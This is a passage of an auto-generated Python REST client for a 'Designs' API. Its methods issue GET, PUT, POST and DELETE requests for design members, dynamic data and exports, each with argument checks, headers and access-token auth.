    >>> thread = api.designs_id_delete_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_delete`")
    collection_formats = {}
    resource_path = '/Designs/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized as a plain object.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='object',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_design_members_count_get(self, id, **kwargs):
    """
    Counts designMembers of Design.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001, or the request thread when called
        asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_design_members_count_get_with_http_info
    return delegate(id, **kwargs)
def designs_id_design_members_count_get_with_http_info(self, id, **kwargs):
    """
    Counts designMembers of Design.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_design_members_count_get_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'where']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_count_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_count_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/designMembers/count'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    # Optional `where` criteria passed through as a query parameter.
    if 'where' in params:
        query_params['where'] = params['where']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into an InlineResponse2001 model.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_design_members_delete(self, id, **kwargs):
    """Deletes all designMembers of this model.

    The request is synchronous unless a `callback` callable is passed as a
    keyword argument, in which case it runs in a background thread that is
    returned to the caller.

    :param str id: Design id (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: None, or the request thread when called asynchronously
    """
    # Both the sync and async paths return exactly what the
    # *_with_http_info helper returns, so a single delegation suffices.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_delete_with_http_info(id, **kwargs)
def designs_id_design_members_delete_with_http_info(self, id, **kwargs):
    """Deletes all designMembers of this model (DELETE, with HTTP info).

    :param str id: Design id (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: None, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_delete" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_delete`")

    path_params = {key: params[key] for key in ('id',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers'.replace('{format}', 'json'), 'DELETE',
        path_params,
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_design_members_fk_delete(self, id, fk, **kwargs):
    """Delete a related item by id for designMembers.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: None, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_design_members_fk_delete_with_http_info(self, id, fk, **kwargs):
    """Delete a related item by id for designMembers (DELETE, with HTTP info).

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: None, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` or `fk` is missing or None
    """
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_fk_delete" % arg)
        params[arg] = value
    del params['kwargs']

    # Both path placeholders are mandatory.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_delete`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_delete`")

    path_params = {key: params[key] for key in ('id', 'fk') if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json'), 'DELETE',
        path_params,
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_design_members_fk_get(self, id, fk, **kwargs):
    """Find a related item by id for designMembers.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_fk_get_with_http_info(id, fk, **kwargs)
def designs_id_design_members_fk_get_with_http_info(self, id, fk, **kwargs):
    """Find a related item by id for designMembers (GET, with HTTP info).

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` or `fk` is missing or None
    """
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_fk_get" % arg)
        params[arg] = value
    del params['kwargs']

    # Both path placeholders are mandatory.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_get`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_get`")

    path_params = {key: params[key] for key in ('id', 'fk') if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json'), 'GET',
        path_params,
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='DesignMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_design_members_fk_put(self, id, fk, **kwargs):
    """Update a related item by id for designMembers.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param DesignMember data: replacement attributes (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_design_members_fk_put_with_http_info(self, id, fk, **kwargs):
    """Update a related item by id for designMembers (PUT, with HTTP info).

    :param str id: Design id (required)
    :param str fk: Foreign key for designMembers (required)
    :param DesignMember data: replacement attributes sent as the request body
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` or `fk` is missing or None
    """
    accepted = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_fk_put" % arg)
        params[arg] = value
    del params['kwargs']

    # Both path placeholders are mandatory; `data` is optional.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_put`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_put`")

    path_params = {key: params[key] for key in ('id', 'fk') if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json'), 'PUT',
        path_params,
        {},
        header_params,
        body=params.get('data'),
        post_params=[],
        files={},
        response_type='DesignMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_design_members_get(self, id, **kwargs):
    """Queries designMembers of Design.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param str filter: filter criteria for the query (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: list[DesignMember], or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_get_with_http_info(id, **kwargs)
def designs_id_design_members_get_with_http_info(self, id, **kwargs):
    """Queries designMembers of Design (GET, with HTTP info).

    :param str id: Design id (required)
    :param str filter: filter criteria, forwarded as a query parameter
    :param callback function: callback for an asynchronous request (optional)
    :return: list[DesignMember], or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'filter', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_get" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_get`")

    path_params = {key: params[key] for key in ('id',) if key in params}
    query_params = {key: params[key] for key in ('filter',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers'.replace('{format}', 'json'), 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[DesignMember]',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_design_members_post(self, id, **kwargs):
    """Creates a new instance in designMembers of this model.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param DesignMember data: attributes of the new instance (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_design_members_post_with_http_info(id, **kwargs)
def designs_id_design_members_post_with_http_info(self, id, **kwargs):
    """Creates a new instance in designMembers of this model (POST, with HTTP info).

    :param str id: Design id (required)
    :param DesignMember data: attributes sent as the request body (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: DesignMember, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'data', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_design_members_post" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_post`")

    path_params = {key: params[key] for key in ('id',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/designMembers'.replace('{format}', 'json'), 'POST',
        path_params,
        {},
        header_params,
        body=params.get('data'),
        post_params=[],
        files={},
        response_type='DesignMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_dynamic_data_get(self, id, **kwargs):
    """Fetches belongsTo relation dynamicData.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param bool refresh: refresh flag forwarded to the server (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: DynamicData, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_dynamic_data_get_with_http_info(id, **kwargs)
def designs_id_dynamic_data_get_with_http_info(self, id, **kwargs):
    """Fetches belongsTo relation dynamicData (GET, with HTTP info).

    :param str id: Design id (required)
    :param bool refresh: forwarded as a query parameter when supplied
    :param callback function: callback for an asynchronous request (optional)
    :return: DynamicData, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'refresh', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_dynamic_data_get" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_dynamic_data_get`")

    path_params = {key: params[key] for key in ('id',) if key in params}
    query_params = {key: params[key] for key in ('refresh',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/dynamicData'.replace('{format}', 'json'), 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='DynamicData',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_exists_get(self, id, **kwargs):
    """Check whether a model instance exists in the data source.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Model id (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: InlineResponse2002, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_exists_get_with_http_info(id, **kwargs)
def designs_id_exists_get_with_http_info(self, id, **kwargs):
    """Check whether a model instance exists in the data source (GET, with HTTP info).

    :param str id: Model id (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: InlineResponse2002, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exists_get" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exists_get`")

    path_params = {key: params[key] for key in ('id',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/exists'.replace('{format}', 'json'), 'GET',
        path_params,
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='InlineResponse2002',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_exports_count_get(self, id, **kwargs):
    """Counts exports of Design.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param str where: criteria to match model instances (optional)
    :param callback function: callback for an asynchronous request (optional)
    :return: InlineResponse2001, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_exports_count_get_with_http_info(id, **kwargs)
def designs_id_exports_count_get_with_http_info(self, id, **kwargs):
    """Counts exports of Design (GET, with HTTP info).

    :param str id: Design id (required)
    :param str where: criteria to match model instances, sent as a query parameter
    :param callback function: callback for an asynchronous request (optional)
    :return: InlineResponse2001, or the request thread when called asynchronously
    :raises TypeError: on an unrecognised keyword argument
    :raises ValueError: when `id` is missing or None
    """
    accepted = ['id', 'where', 'callback', '_return_http_data_only']
    params = locals()
    for arg, value in iteritems(params['kwargs']):
        if arg not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_count_get" % arg)
        params[arg] = value
    del params['kwargs']

    # `id` fills the {id} slot of the resource path and must be present.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_count_get`")

    path_params = {key: params[key] for key in ('id',) if key in params}
    query_params = {key: params[key] for key in ('where',) if key in params}

    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/exports/count'.replace('{format}', 'json'), 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='InlineResponse2001',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_exports_delete(self, id, **kwargs):
    """Deletes all exports of this model.

    Synchronous unless a `callback` callable is passed as a keyword
    argument; then the request thread is returned instead.

    :param str id: Design id (required)
    :param callback function: callback for an asynchronous request (optional)
    :return: None, or the request thread when called asynchronously
    """
    # Delegate unconditionally: the helper already yields either the
    # payload or the async request thread.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_exports_delete_with_http_info(id, **kwargs)
def designs_id_exports_delete_with_http_info(self, id, **kwargs):
    """
    Deletes all exports of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace (self, id, kwargs, all_params);
    # validated kwargs are merged into it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_delete`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op: this path template
    # contains no '{format}' segment.
    resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # DELETE /Designs/{id}/exports; no response body is deserialized
    # (response_type=None).
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_exports_fk_delete(self, id, fk, **kwargs):
    """
    Delete a related item by id for exports.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_fk_delete(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_exports_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_exports_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Delete a related item by id for exports.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_fk_delete_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'fk']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_fk_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_delete`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_delete`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # DELETE /Designs/{id}/exports/{fk}; no response body is deserialized.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_exports_fk_get(self, id, fk, **kwargs):
    """
    Find a related item by id for exports.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_fk_get(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_exports_fk_get_with_http_info(id, fk, **kwargs)
def designs_id_exports_fk_get_with_http_info(self, id, fk, **kwargs):
    """
    Find a related item by id for exports.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
